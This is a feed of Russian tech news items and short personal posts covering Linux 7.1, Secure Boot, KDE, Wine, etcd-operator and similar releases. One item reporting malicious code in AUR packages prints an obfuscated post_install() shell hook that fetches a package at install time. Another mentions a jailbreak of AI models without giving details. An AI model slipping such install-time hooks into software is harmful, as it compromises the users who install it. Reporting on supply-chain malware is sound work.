Вычислительный кластер из 2000 смартфонов Google Pixel

В среднем пользователи меняют смартфон каждые четыре года, при том, что смена вызвана социальными факторами и желанием получить новую модель, а не выходом из строя или устареванием вычислительных возможностей. Получается, что без дела остаются миллионы устройств с относительно мощными процессорами. Google предлагает давать подобным устройствам вторую жизнь и создавать из них кластеры для облачных вычислений.

Отмечается, что производительность процессорных ядер современных смартфонов при выполнении однопоточных задач сопоставима или превосходит производительность ядер современных серверов. Например, в большинстве проведённых однопоточных тестов SPEC 2017 высокопроизводительные ядра смартфона 2023 Pixel Fold превзошли по производительности (на графике синий) ядра типового сервера ASUS RS720A-E11 (на графике прозрачная рамка) при оценке производительности отдельных процессорных ядер. Ключевое отличие в том, что серверные процессоры оснащены большим числом высокопроизводительных многопоточных ядер, в то время как SoC смартфонов сочетают небольшое число высокопроизводительных и энергоэффективных ядер. С учётом числа ядер вычислительные возможности 25-50 смартфонов рассматриваются как эквивалент современному серверу.

При построении кластера использованы только материнские платы из смартфонов, а вместо Android установлен один из серверных дистрибутивов Linux. Так как смартфоны комплектуются относительно небольшим размером ОЗУ, возможности кластера ограничиваются задачами, для которых достаточно имеющейся в одном устройстве памяти. Для упрощения оркестровки выполнения задач образующие кластер смартфоны разделены на группы по 25–50 устройств, на которых запуск приложений производится в изолированных контейнерах, управляемых через Kubernetes.

Кластер планируют ввести в строй осенью этого года и использовать для сопровождения курсов по параллельным вычислениями и системному программированию. Проведённые эксперименты показали, что кластер из 20 смартфонов выдерживает нагрузку по сопровождению курсов для более чем 75 студентов, обеспечивая задержки ниже, чем у ранее применяемого бэкенда на базе AWS. Предполагается, что кластер из 2000 смартфонов будет способен предоставить вычислительные ресурсы для сопровождения сотен курсов.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65689

I have prepared a directory of sites that work well with #Dillo with a focus on human crafted sites to help new users find useful content:

https://dir.dillo-browser.org/

There is A LOT of content to explore, so be mindful of the time when entering the rabbit hole.

You can also suggest new sites to be added at the end of the page.

В сетевом магазине без интернета нельзя купить товар, который нужно пробивать через qr-код (молоко, сыр, ...) даже за наличку
#сегодня

Релиз ядра Linux 7.1

В новую версию принято 17275 исправлений от 2589 разработчиков, размер патча - 57 МБ (изменения затронули 13528 файлов, добавлено 751785 строк кода, удалено 405916 строк). В прошлом выпуске было 15624 исправлений от 2477 разработчиков, размер патча - 56 МБ. Около 41% всех представленных в 7.1 изменений связаны с драйверами устройств, примерно 12% изменений имеют отношение к обновлению кода, специфичного для аппаратных архитектур, 14% связано с сетевым стеком, 5% - с файловыми системами и 3% c внутренними подсистемами ядра.

Основные новшества в ядре 7.1 (1, 2, 3):

• Дисковая подсистема, ввод/вывод и файловые системы
  • В состав принята новая реализация файловой системы NTFS - ntfsplus, основанная на коде удалённого из ядра классического драйвера ntfs. Старый драйвер был переработан, расширен возможностью записи данных и адаптирован для поддержки современных возможностей, таких как использование фолиантов страниц памяти (folios) вместо структуры buffer_head. В новом драйвере реализовано отложенное выделение блоков, позволившее добиться высокой производительности операций записи и снижения фрагментации. Для буферизированных операций записи/чтения, прямого ввода/вывода, маппинга экстентов и операций страничной записи/чтения задействована библиотека iomap. В тестах iozone драйвер ntfsplus оказался на 3-5% быстрее ntfs3 при записи в однопоточном режиме и на 35-110% при использовании 4 потоков. Скорость чтения ntfsplus и ntfs3 находится примерно на одном уровне. Драйвер ntfs3 остаётся в составе ядра и в него внесены исправления и небольшие улучшения.
  • Добавлена поддержка генерации и верификации данных проверки целостности T10 на уровне файловой системы, а не блочного устройства, что позволяет добиться повышения производительности операций чтения.
  • В драйвер блочных устройств ublk, позволяющий вынести специфичную логику на сторону процесса в пространстве пользователя, добавлена поддержка ввода/вывода через разделяемую память без копирования данных между буферами (режим zero-copy).
  • Для самошифруемых блочных устройств SED-OPAL добавлены ioctl для управления режимом Single User и реализована команда STACK_RESET.
  • В Btrfs объявлена стабильной поддержка ioctl-операции "shutdown", позволяющей перевести ФС в состояние, при котором предпринимается попытка завершения выполнения уже запущенных операций, но блокируются все новые операции.
  • В exfat реализована возможность резервированием пустых областей через вызов fallocate().
  • В ФС CIFS добавлена поддержка создания временных файлов с флагом O_TMPFILE.
  • В системный вызов fsmount() добавлена опция FSMOUNT_NAMESPACE, создающая новое пространство имён точек монитирования для монтируемой файловой системы. В системные вызовы clone3() и unshare() добавлены флаги для возвращения нового пространства имён точек монитирования, содержащего только примонтированную пустую ФС-заглушку на базе nullfs, драйвер fs-dax c ФС-интерфейсом к устройствам DAX (Direct Access).
  • В NFS-сервер добавлена защита от атак по подбору файловых дескрипторов, реализованная через заверение дескрипторов криптографической подписью. Защита включается через опцию монтирования sign_fh.
  • Добавлен символьный драйвер fs-dax, предоставляющий интерфейс для взаимодействия с устройствами DAX (Direct Access), поддерживающими работу в обход страничного кэша. Указанный интерфейс необходим для интеграции в ядро файловой системы famfs, размещаемой в оперативной памяти.
  • В файловой системе Ceph реализован сбор метрик о вводе/выводе в привязке к подразделам.
  • Память и системные сервисы
    • Принята первая серия изменений для прекращения поддержки процессоров i486. Из Kconfig удалены опции для сборки ядра с поддержкой процессоров 486DX, 486SX и AMD ELAN (CONFIG_M486, CONFIG_M486SX и CONFIG_MELAN), а из Makefile исключены опции компиляции для систем i486 (-march=i486). Код для фактической поддержки работы на процессорах i486 пока оставлен в ядре, но сборка для подобных систем теперь потребует применения патчей к сборочным файлам. Причины удаления поддержки процессоров i486 обусловлены желанием избавить ядро от усложнённого кода, эмулирующего некоторые аппаратные операции, такие как CX8 (сравнить и обменять 8 байт) и TSC (счётчик циклов CPU, используемый в планировщике задач).
    • В драйвере amd-pstate, применяемом для управления энергопотреблением на системах с процессорами AMD, реализовано динамическое переключение настроек производительности и изменение поведения управления питанием в зависимости от работы от стационарного питания или аккумулятора. При стационарном подключении теперь активируется режим "performance", а при работе от аккумулятора - "balance_performance".
    • Задействован по умолчанию механизм Intel FRED (Flexible Return and Event Delivery), позволяющий повысить эффективность и надёжность доставки информации о низкоуровневых событиях. Повышение производительности и сокращение задержек обеспечивается благодаря возвращению событий при помощи процессорной инструкции IRET вместо передачи событий через таблицу IDT (Interrupt Descriptor Table). Повышение надёжности достигается благодаря раздельной обработке поступления события в контексте ядра и контексте пользователя, защиты от вложенного выполнения NMI и сохранения в расширенном кадре стека всех связанных с исключением регистров CPU.
    • В подсистему perf добавлена поддержка блоков мониторинга производительности памяти (PMU - Performance Monitoring Unit), используемых в SoC NVIDIA Tegra410.
    • Ускорено выполнение операций futex на системах ARM, благодаря задействованию инструкций Arm 9.6 LSUI, позволяющих ядру обращаться к памяти пространства пользователя без предварительного отключения режима защиты PAN (Privileged Access Never).
    • На системах с процессорами ARM улучшена поддержка расширения архитектуры набора команд MPAM (Memory System Resource Partitioning and Monitoring) и добавлена возможность её использования в пространстве пользователя для управления ресурсами через механизм resctrl. MPAM обеспечивает пометку каждого обращения к памяти идентификатором секции (PARTID, Partition ID) и идентификатором группы мониторинга (PMG, Monitoring Group ID). В привязке к PARTID можно ограничить потребление ресурсов, таких как пропускная способность памяти или размер кэша, что бы какая-то группа задач не заняла все ресурсы. В контексте мониторинга сочетание PMG и PARTID можно использовать для отслеживание потребления ресурсов памяти при определённых видах нагрузки.
    • Добавлена возможность использования режима реального времени (PREEMPT_RT) на 32-разрядных процессорах ARM. Ранее поддержка PREEMPT_RT была обеспечена для архитектур x86 и x86-64, ARM64, RISC-V и LoongArch.
    • В системный вызов clone3() добавлены новые флаги: CLONE_NNP - запрет получения новых привилегий в созданном процессе; CLONE_AUTOREAP - автоматическое завершение процесса вместо его превращения в процесс-зомби до выполнения функции wait() родительским процессом; CLONE_PIDFD_AUTOKILL - завершение дочернего процесса в случае закрытия связанного с ним дескриптора pidfd (например, при завершении родительского процесса).
    • Для каждого модуля ядра в каталог /sys/module добавлен файл import_ns, содержащий список импортированных пространств имён символов (symbol namespace).
    • В систему асинхронного ввода/вывода io_uring добавлена поддержка использования подсистемы BPF для создания обработчиков. Например, можно заменить основной цикл диспетчеризации на BPF-программу.
    • В подсистеме BPF модернизирован анализ использования стека, что значительно ускорило проверку верификатором многих BPF-программ.
    • С целью оптимизации производительности переписана подсистема hrtimer (high resolution timer). Планировщик задач теперь может использовать таймеры с высоким разрешением без потери производительности вместо менее точных таймеров.
    • Продолжен перенос изменений из ветки Rust-for-Linux, связанных с использованием языка Rust в качестве второго языка для разработки драйверов и модулей ядра (поддержка Rust не активна по умолчанию, и не приводит ко включению Rust в число обязательных сборочных зависимостей к ядру). До версии 1.85 (поставляется в Debian 13) повышены требования к версии Rust, необходимой для сборки компонентов ядра. Добавлена экспериментальная Kconfig-опция CONFIG_RUST_INLINE_HELPERS для встраивания Си-прослоек в Rust-код во время компиляции (оптимизация ускорила работу блочного драйвера null на 2%). Добавлен макрос 'const_assert!'. Расширены возможности модулей 'sizes', 'clk', 'ptr', 'sync', 'error'.
    • В механизм SCHED_EXT, позволяющий использовать BPF для создания планировщиков CPU, добавлена начальная возможность создания вложенных планировщиков (sub-scheduler), при помощи которых для каждого cgroup можно задействовать собственный планировщик задач.
    • Продолжена оптимизация подсистемы подкачки (swap). Удалена старая структура swap_map, заменённая на механизм "Swap Table". Изменение позволило повысить производительность и уменьшить потребление памяти в подсистеме подкачки.
    • В подсистему DAMON (Data Access MONitor), позволяющую отслеживать доступ процесса к данным в оперативной памяти (например, можно узнать к каким областям памяти обращался процесс, а какие области памяти остались невостребованными), добавлена поддержка разных алгоритмов автоматического тюнинга квот.
    • В подсистеме трассировки реализована концепция внешних кольцевых буферов, позволяющая получать данные трассировки из виртуальных машин. Возможность задействована в гипервизорах KVM и nVHE для передачи данных трассировки из гостевой системы на сторону хоста.
    • В подсистему RV (Runtime Verification), предназначенную для проверки корректности работы высоконадёжных систем, добавлены компоненты мониторинга "stall" для отслеживания задач, выполнение которых временно приостановлено или заблокировано, и "deadline" для анализа поведения планировщика задач.
    • Виртуализация и безопасность
      • По умолчанию выставлен флаг PROC_MEM_FORCE_PTRACE, допускающий обход прав доступа к памяти процесса через файл /proc/PID/mem только для процессов, применяющих для отладки системный вызов ptrace().
      • Добавлен новый набор hook-ов для LSM-модулей (Linux Security Module), упрощающий реализацию политик для стековых файловых систем, таких как overlayfs. В LSM также добавлен hook для управления доступом к Unix-сокетам, который задействован в LSM-модуле Landlock для назначения политик доступа к Unix-сокетам.
      • Во встроенную криптобиблиотеку lib/crypto, предоставляющую более простые и быстрые функции, чем в традиционном crypto API, добавлена поддержка алгоритмов AES-CMAC, AES-XCBC-MAC, AES-CBC-MAC, GHASH и SM3. Добавлена документация по lib/crypto.
      • Реализован режим pKVM (Protected KVM) для строгой изоляции анонимной памяти с использованием расширений виртуализации для архитектуры AArch64. В данном режиме страницы памяти гостевой исключаются из таблицы виртуальных адресов хостовой системы.
      • В гипервизор KVM добавлена поддержка пятой версии виртуального контроллера прерываний ARM (VGICv5 - ARM Virtual Generic Interrupt Controller v5).
      • Сетевая подсистема
        • Для unix-сокетов, создаваемых функцией socket(), реализована поддержка расширенных атрибутов файлов (xattr) "user.*". Из областей применения отмечается выставление меток через расширенные атрибуты к Unix-сокетам, используемым для IPC Varlink, с целью их выделения из общей массы для инспектирования и отладки работы IPC при помощи BPF-программ. В systemd-journald расширенные атрибуты намерены использовать для определения формата лога в привязке к сокету /dev/log.
        • Удалена поддержка протокола UDP-Lite (RFC 3828), допускающего доставку пакетов с неправильной контрольной суммой с расчётом на то, что, например, частично повреждённые аудио и видеоданные могут быть восстановлены на уровне кодека. Протокол удалён так как им никто не пользуется.
        • Убрана возможность сборки стека IPv6 в форме модуля ядра, которая не применялась на практике (IPv6 либо встраивают в ядро, либо полностью отключают), но усложняла сопровождение так как при сборке IPv6 модулем ядра (CONFIG_IPV6=m), множество подсистем вынуждены добавлять бесполезные обработчики на случай выгрузки модуля IPv6.
        • Оборудование
          • В драйвере AMDGPU включён новый дисплейный движок (DC) для APU AMD серии HD 7000 (Sea Islands, GCN 1.1).
          • В драйвер Nouveau добавлена начальная поддержка GPU NVIDIA GA100 на базе микроархитектуры Ampere.
          • Продолжена работа над drm-драйвером (Direct Rendering Manager) Xe для GPU на базе архитектуры Intel Xe, которая используется в видеокартах Intel семейства Arc и интегрированной графике, начиная с процессоров Tiger Lake. Добавлена поддержка графической подсистемы процессоров Intel Nova Lake-P. Реализованы очищаемые буферные объекты (Purgeable Buffer Objects).
          • Продолжена интеграция компонентов драйвера Nova для GPU NVIDIA, оснащённых GSP-прошивками, используемыми начиная с серии NVIDIA GeForce RTX 2000 на базе микроархитектуры Turing. Драйвер написан на языке Rust. Добавлена начальная поддержка GPU на базе микроархитектуры Turing.
          • Добавлена поддержка звуковых ASoC AMD RPL DMIC, Cirrus Logic CS42L43, CS47L47, NVIDIA CPCAP и WM8962. Улучшена поддержка звуковых устройств с интерфейсом USB: Huawei Headset, Focusrite Novation, MV-Silicon, Studio 1824, Arturia AF16Rig, Hotone Audio, Feaulle Rainbow, PreSonus AudioBox, Moondrop Ju Jiu, Scarlett 18i20.
          • Удалена поддержка применяемых в SoC Baikal-T1 контроллеров AHCI SATA и PCIe, а также драйверов таймера, памяти, physmap, шины, hwmon, dwc и bt1-rom. В качестве причины удаления называется отсутствие сопровождения и незавершённая интеграция в состав ядра компонентов платформы Baikal, производство которой в РФ свернули в ноябре 2025 года.
          • Удавлены 12 драйверов для Ethernet-устройств с интерфейсами ISA и PCMCIA, выпускавшихся до 2002 года, для которых не нашлись пользователи, применяющие их в рабочих системах. Также из ядра исключены подсистема ISDN, реализации протоколов AX.25, CAIF и Bluetooth CMTP (Common ISDN Application Programming Interface Message Transport Protocol), драйверы yellowfin (Yellowfin Gigabit-NIC), hamachi (Hamachi GNIC-II), hamradio (Amateur Radio), inport и logibm (busmouse). Причиной удаления стало отсутствие активных сопровождающих на фоне увеличения числа выявляемых при помощи syzbot и AI-инструментов ошибок, которые никто не берётся исправлять и вся нагрузка нa устранение серьёзных проблем ложится на сопровождающих основные сетевые подсистемы ядра. Всего удалено более 140 тысяч строк кода.
          
          
          Источник: https://www.opennet.ru/opennews/art.shtml?num=65686
          

В AUR осуществлена подстановка вредоносного кода ещё в 54 пакета

   post_install() {
       $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
   }

Истекает время жизни сертификата, которым заверен загрузчик для UEFI Secure Boot в дистрибутивах Linux

Существующие системы без установки обновления shim продолжат загрузку до тех пор, пока открытый ключ сертификата не будет удалён из прошивки или не помещён в список отозванных сертификатов UEFI (DBX). Ключом Microsoft заверяется только загрузочная прослойка shim, в которой присутствует публичный ключ дистрибутива, применяемый для заверения загружаемых компонентов, таких как загрузчик GRUB2, ядро Linux, модули ядра и используемые при загрузке процессы, такие как fwupd. Подобный подход позволяет заверять в Microsoft только изменения в прослойке shim и самостоятельно обеспечивать верификацию процесса загрузки дистрибутива.

Сертификат Microsoft для заверения сторонних прошивок для UEFI Secure Boot действует с 2011 года. В 2023 году ему на смену сгенерирован новый сертификат, который стал применяться для формирования подписей с октября 2025 года. В репозиторий Fedora Rawhide, на базе которого формируется релиз Fedora 45, уже добавлен обновлённый shim, заверенный несколькими ключами для обеспечения максимальной совместимости с оборудованием (может использоваться как на старых прошивках без открытого ключа нового сертификата, так и на прошивках без открытого ключа старого сертификата).

Несмотря на то, что истечение срока действия сертификата Microsoft не должно повлиять на работоспособность загрузки, разработчики Fedora рекомендуют пользователям обновить БД c ключами для Secure Boot при появлении новых версий прошивок для их оборудования. Для определения факта загрузки системы в режиме UEFI Secure Boot можно использовать команду "mokutil --sb-state", а для отображения списка имеющихся в прошивке открытых ключей - "mokutil --db --short". Для просмотра ключей, которыми подписана прослойка shim можно запустить команду "sudo pesign -S -i /boot/efi/EFI/fedora/shimx64.efi", предварительно установив пакет pesign. Для проверки наличия обновления прошивки и его установки можно выполнить команду "sudo fwupdmgr update".

Следующая версия прослойки shim будет заверена только новым сертификатом Microsoft и обновление прошивки необходимо для подготовки своих систем к этому изменению. Обновление shim будет выпущено в случае выявления уязвимостей и серьёзных ошибок, что может произойти как через месяц, так и через год. За время существования shim в проекте находили критические уязвимости, при этом последний отчёт о проблемах c безопасностью в shim был выпущен лишь несколько дней назад.

В отчёте отмечены две недавно выявленные уязвимости CVE-2026-8863 и CVE-2026-10797, позволяющие добиться выполнения своего кода на раннем этапе загрузки до передачи управления операционной системе, обойти защиту UEFI Secure Boot и реализовать загрузку незаверенных цифровой подписью компонентов ядра. Проблемы затрагивают версии shim до выпуска 0.9 включительно, сформированные до 2016 года. Атаке подвержены очень старые системы, такие как RedHat Enterprise Linux 7.2, CentOS 7.2, Oracle Linux 7.2, ROSA Linux R10/R9 и openSUSE c shim 0.9. Прослойки shim до версии 0.9 включительно добавлены в базу отозванных цифровых подписей DBX (UEFI Forbidden Signature Database) и в случае обновления DBX в системе не смогут использоваться для загрузки в режиме UEFI Secure Boot.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65683

Сижу у отца дома, он смотрит, простите, мундиаль, вдруг дикторша срывающимся голосом "срочная новость"! Я думаю, ну всё бля приехали. Оказывается, этой новостью был анонс Трампом какой-то очередной сделки с Ираном. И такими срочными новостями они кормят пенсов по десять раз на дню.

Удостоверяющий центр GlobalSign начал отзыв EV-сертификатов у компаний, находящихся под санкциями

Речь ведётся о расширенных TLS-сертификатах уровня EV (Extended Validation), подтверждающих заявленные параметры идентификации и требующих не только проверки владения доменом, но и проведения удостоверяющим центром проверки существования и легального статуса компании, получающей сертификат. В браузерах при работе с сайтами, имеющими EV-сертификаты и сертификаты, полученные только через подтверждение домена, отображается одинаковый значок.

Указано, что во вступившей в силу 4 мая новой версии регламента выдачи EV-сертификатов содержится прямой запрет для удостоверяющих центров выдавать сертификаты компаниям из санкционных списков, а проверка по спискам блокировки стала не рекомендательной, а обязательной.

Данная информация не соответствует действительности, так как упомянутые требования были добавлены CA/Browser Forum в более ранней версии регламента (как минимум прослеживаются в версии от 2022 года). В пункты 3.2.2.12.2 и 4.1.1.1, предписывающие проверку в санкционных списках, в новой версии документа изменения не вносились (версия 2.0.2 от 4 мая 2026 года, версия 2.0.1 от 6 мая 2024 года).

В пункте 4.1.1.1 среди условий прохождения проверки при получении EV-сертификата как минимум с 2022 года упомянуто отсутствие проверяемой компании в списках запрещённых организаций или организаций, подпадающих под эмбарго, в соответствии с законодательством страны, в которой зарегистрирован удостоверяющий центр. В пункте 3.2.2.12.2 указано, что удостоверяющий центр обязан проверить наличие запросившей сертификат организации в списках запрещённых персон и организаций, действующих в стране, в юрисдикции которой находится удостоверяющий центр, а также в странах, в которых удостоверяющий центр осуществляет свою деятельность. Удостоверяющий центр обязан не выдавать EV-сертификат, если запросившая сертификат организация присутствует в подобных списках или если она ведёт деятельность или зарегистрирована в стране, с которой запрещено ведение бизнеса законодательством страны, в которой зарегистрирован удостоверяющий центр.

Компания GlobalSign зарегистрирована в Бельгии и обязана выполнять санкционные ограничения, действующие в Евросоюзе. Помимо индивидуальных санкций, в Евросоюзе также действует введённый в 14-пакете санкций запрет на предоставление корпоративного ПО и оказание IT-услуг российским юридическим лицам. Предполагается, что GlobalSign до сегодняшнего дня не выполнял данные требования, пользуясь введённым в законодательство исключением, позволявшим предоставлять подсанкционным компаниям услуги для обеспечения безопасности всего интернета. Теперь выдача SSL-сертификатов квалифицирована юристами GlobalSign или регулирующими органами как оказание коммерческих IT-услуг, что подпадает под санкционные запреты.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65681

#сегодня ещё немного Пскова

В KDE улучшена поддержка приложений на базе GTK 2 с тёмной темой оформления

Изменения в ветке KDE Plasma 6.8:

• Расширены возможности для определения использования тёмных тем оформления в приложениях на базе GTK 2 и применения к ним тёмных вариантов тем пиктограмм для исключения ситуаций когда в тёмном интерфейсе показываются светлые пиктограммы.
• В компоненты для интеграции с web-браузерами добавлена поддержка Flatpak-пакетов с Microsoft Edge.
• Увеличена верхняя область захвата для перетаскивания не раскрытых на весь экран окон приложений с темой оформления Breeze, по аналогии с тем, как ранее были увеличены области захвата за низ и боковые грани.
• Реализовано отображение уведомления о низком заряде аккумуляторов подключённых устройств даже при запуске программ в полноэкранном режиме, чтобы пользователь не пропустил полный разряд.
• В эффектах "Peek at Desktop" и "Window Aperture" учтены системные настройки скорости анимации.
• Представление информации и формулировки в диалогах предоставления прав доступа через систему порталов XDG (xdg-desktop-portal-kde) унифицированы с другими диалогами KDE.
• В хранителе экрана обеспечен учёт таймаута, заданного в системе через параметры PAM (Pluggable Authentication Modules), без добавления сверх них дополнительных задержек. Добавлен индикатор включения режима для людей с ограниченными возможностями, увеличивающего время удержания клавиш для срабатывания нажатия.
• В KDE Frameworks 6.28 улучшено выравнивание эскизов в диалогах открытия и сохранения файлов, а также разрешено использование по-отдельности клавиши Meta для открытия обзорного режима в KWin.
• В Qt 6.11.2 устранена ошибка, приводившая к аварийному завершению KDE Plasma при загрузке показываемых в виджете Media Player изображений обложек альбомов для контента во внешних сервисах, таких как YouTube.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65679

Новые версии Wine 11.11 и StartWine-Launcher 423

Наиболее важные изменения:

• В драйвер winewayland, позволяющий использовать Wine в окружениях на базе протокола Wayland, добавлена поддержка Wayland-протокола alpha-modifier-v1, позволяющего приложениям менять уровень прозрачности поверхности и выносить операции по обеспечению прозрачности на сторону композитного сервера.
• В winewayland реализована поддержка многослойных окон (WS_EX_LAYERED), компонуемых из нескольких слоёв для реализации эффектов, таких как полупрозрачность и непрямоугольная форма окна (в wine пока реализована только полупрозрачность).
• В winewayland добавлены hints-флаги для задания максимального и минимального размера статичных окон, размер которых не может менять пользователь.
• Вместо криптографической библиотеки TomCrypt в состав включена библиотека SymCrypt, развиваемая компанией Microsoft и поддерживающая алгоритмы постквантового шифрования. Переход на SymCrypt позволил задействовать ассемблерные оптимизации операций шифрования для архитектур x86-64, ARM64, ARM и i386.
• Продолжена работа по размещению в разделяемой памяти структур данных библиотеки user32, связанных с окнами.
• Улучшена совместимость с VBScript.
• В winevulkan осуществлён переход на использование спецификации Vulkan 1.4.353. В wined3d для инициализации поддержки Vulkan задействовано расширение VK_KHR_external_fence_capabilities.
• Решена проблема со скрытием файлов, имя которых начинается с точки, в диалоге открытия файла.
• Устранены регрессии, нарушавшие нормальную работу многопоточных приложений, использующих функцию SendMessage().
• Закрыты отчёты об ошибках, связанные с работой приложений: uTorrent 3.x, Foxit Reader 8.x, Foxit PhantomPDF Business v10.0, winmine.exe, Guitar Pro v8.1.3, Sunlogin, uSimmics, MS-Money 2000.
• Закрыты отчёты об ошибках, связанные с работой игр: Space Empires V, Wreckfest, Battle.Net, Total War: Shogun 2, Spider-Man Remastered, Yesterday Origins, Think or Swim, Gray Matter, Istaria.

Дополнительно можно отметить выпуск приложения Startwine-Launcher 423, развиваемого для запуска в Linux-системах программ и игр, собранных для платформы Windows. Основной целью разработки StartWine-Launcher было упрощение процесса создания новичками префиксов Wine, - наборов библиотек и зависимостей Windows, необходимых для работы Windows-приложений в Linux. Код StartWine-Launcher написан на языке Python и распространяется под лицензией GPLv3. Интерфейс реализован на основе библиотеки GTK.

В новой версии Startwine-Launcher обновлён список версий Wine, а также обновлены префиксные конфигурации, библиотеки и драйверы в контейнере. В utils добавлены библиотеки Steam для совместимости со старыми играми. Исправлены ошибки в скрипте установки, коде обновления установленных данных приложения и во вспомогательных функциях в sw_runlib.



Источник: https://www.opennet.ru/opennews/art.shtml?num=65678

Власти США предписали Anthropic приостановить доступ к AI-моделям Fable 5 и Mythos 5

Поводом для предписания, по предположению Anthropic, послужило обнаружение метода обхода защитных механизмов (jailbreak) модели Fable 5. В Anthropic заявили, что изучили продемонстрированную технику и пришли к выводу, что речь идёт об узком, неуниверсальном обходе, позволяющем выявлять лишь небольшое число ранее известных незначительных уязвимостей, которые могут быть найдены и другими общедоступными моделями, например GPT-5.5, без какого-либо обхода ограничений.

Компания подчинилась юридически обязательной директиве, но не согласна с тем, что обнаружение узкоспециализированного потенциального обхода защиты является основанием для отзыва коммерческой модели, развёрнутой для сотен миллионов пользователей, и считает произошедшее недоразумением, работая над восстановлением доступа.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65677

Проект Cozystack представил переработанный etcd-operator с новым API

Главное изменение в новом etcd-operator - отказ от StatefulSet для управления узлами. Теперь оператор напрямую работает со штатным Membership API etcd (MemberAdd, MemberPromote и MemberRemove) и сам добавляет участников, повышает learner до голосующего узла и выводит узлы из кворума, что даёт оператору полный контроль над составом кластера.

Параллельно разработчики проекта etcd развивают с нуля собственны1 официальный etcd-operator. По функциональности официальный оператор пока уступает etcd-operator от проекта Cozystack. Так как прежняя реализация etcd-operator уже работает в рабочих окружениях и используется в Cozystack и Kamaji, её развитие было продолжено отдельно от официально реализации от проекта etcd.

Развиваемый проектом Cozystack оператор управляет кластерами etcd через два ресурса. EtcdCluster описывает желаемое состояние: число реплик, версию etcd, параметры хранилища, TLS, аутентификацию и настройки etcd. EtcdMember создаётся для каждого узла кластера и владеет его Pod и PVC. В отличие от типовых решений оператор не использует StatefulSet и обслуживает независимо Pod и PVC каждого узла. Состав кластера меняется через API Membership etcd: оператор добавляет новые узлы как learner (MemberAdd), затем повышает их до голосующих участников (MemberPromote). Удаление проходит через MemberRemove, с корректным выводом из кворума. При паузе кластера узлы сохраняют свою идентичность.

Основные возможности:

• развёртывание кластера и масштабирование в обе стороны, по одному узлу за раз: новые узлы стартуют в режиме learner, удаление корректно выводит их из кворума;
• остановка кластера без потери данных (spec.replicas: 0) и возобновление работы с теми же идентификаторами кластера и узлов;
• хранение данных в PVC по умолчанию или в tmpfs, если данные можно восстановить заново; при потере Pod оператор автоматически пересоздаёт узлы с хранилищем в памяти;
• раздельная настройка TLS для клиентских и межузловых соединений: можно подключить свои Secret или поручить оператору выпуск и продление сертификатов через cert-manager;
• аутентификация с единственным пользователем root; его учётные данные задаются через Secret;
• создание снапшотов в S3 или PVC через ресурс EtcdSnapshot и восстановление кластера из снапшота при первом развёртывании;
• автоматический PodDisruptionBudget, который не даёт операциям drain нарушить кворум;
• валидация спецификаций средствами apiserver через CEL-выражения в CRD, без webhook и зависимости от cert-manager;
• подресурс /scale для kubectl scale и VerticalPodAutoscaler, порт метрик 2381, проброс affinity и topologySpreadConstraints;
• плагин kubectl-etcd для повседневных эксплуатационных задач (day-2 operations) после развёртывания кластера.

По сравнению со старой реализацией (v1alpha1) изменилось следующее:

• API-группа сменилась с etcd.aenix.io на etcd-operator.cozystack.io;
• вместо StatefulSet оператор использует отдельный ресурс EtcdMember для каждого узла;
• произвольный словарь spec.options заменён типизированным набором параметров: quota-backend-bytes, режим и интервал автокомпактификации, snapshot-count; свободная map позволяла передавать флаги, которые конфликтовали с логикой оператора;
• ресурс EtcdBackup переименован в EtcdSnapshot, семантика сохранена;
• валидация перенесена с webhook на CEL-правила в CRD;
• сервис кластера переведён в режим headless, чтобы у узлов были стабильные DNS-имена.

Миграция проходит на месте с помощью etcd-migrate. Инструмент адаптирует работающий кластер старого оператора без переноса данных, перезапуска Pod и потери кворума. Он меняет только владельцев объектов, метки и аннотации. После этого новый оператор берёт управление на себя. Клиенты, которые обращаются к кластеру по DNS-имени, продолжают работать без изменений.

Реализация etcd-operator от Cozystack закрывает большинство пунктов плана развития официального etcd-оператора проекта etcd. Статус по пунктам плана:

1. Создание нового кластера etcd, например из 3 или 5 узлов, с указанной версией etcd — реализовано.
2. Определение состояния здоровья кластера — реализовано.
3. Включение TLS-шифрования соединений, включая продление сертификатов — реализовано.
4. Обновление в пределах патч-версий или на одну минорную версию — реализовано частично: значение spec.version применяется только к новым узлам.
5. Масштабирование в обе стороны, например 1 -> 3 -> 5 узлов и обратно — реализовано.
6. Настройка параметров etcd через флаги или переменные окружения — реализовано как закрытый типизированный набор параметров.
7. Восстановление одного отказавшего члена кластера, если кворум сохраняется — реализовано частично: автоматической замены членов с повреждённым PVC пока нет.
8. Восстановление после отказа нескольких членов кластера и потери кворума — не реализовано, работа запланирована.
9. Создание резервной копии кластера по запросу — реализовано.
10. Периодическое резервное копирование кластера — сознательно вынесено за рамки оператора: периодические снапшоты предлагается запускать штатным CronJob.

Кроме того, v1alpha2 даёт возможности, которых нет в плане развития официального оператора:

• остановка кластера до нуля реплик, пауза и возобновление с сохранением идентичности кластера и узлов;
• хранилище в памяти (tmpfs) с автоматической заменой узлов силами оператора;
• валидация на стороне apiserver через CEL, без webhook и зависимости от сертификатов;
• автоматический PodDisruptionBudget для голосующих узлов;
• подресурс /scale с заполненным status.selector, чтобы напрямую работали kubectl scale и VerticalPodAutoscaler.targetRef;
• проброс параметров планирования affinity и topologySpreadConstraints, а также объединение additionalMetadata во всех объектах, которые создаёт оператор;
• инструмент миграции с прежнего оператора без остановки кластера;
• плагин kubectl-etcd для эксплуатационных задач.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65673

Выпуск дистрибутива Proxmox Mail Gateway 9.1

Установочный ISO-образ доступен для свободной загрузки. Специфичные для дистрибутива компоненты открыты под лицензией AGPLv3. Для установки обновлений доступен как платный репозиторий Enterprise, так и два бесплатных репозитория, которые отличаются уровнем стабилизации обновлений. Системная часть дистрибутива базируется на пакетной базе Debian. Возможна установка компонентов Proxmox Mail Gateway поверх уже работающих серверов на базе Debian.

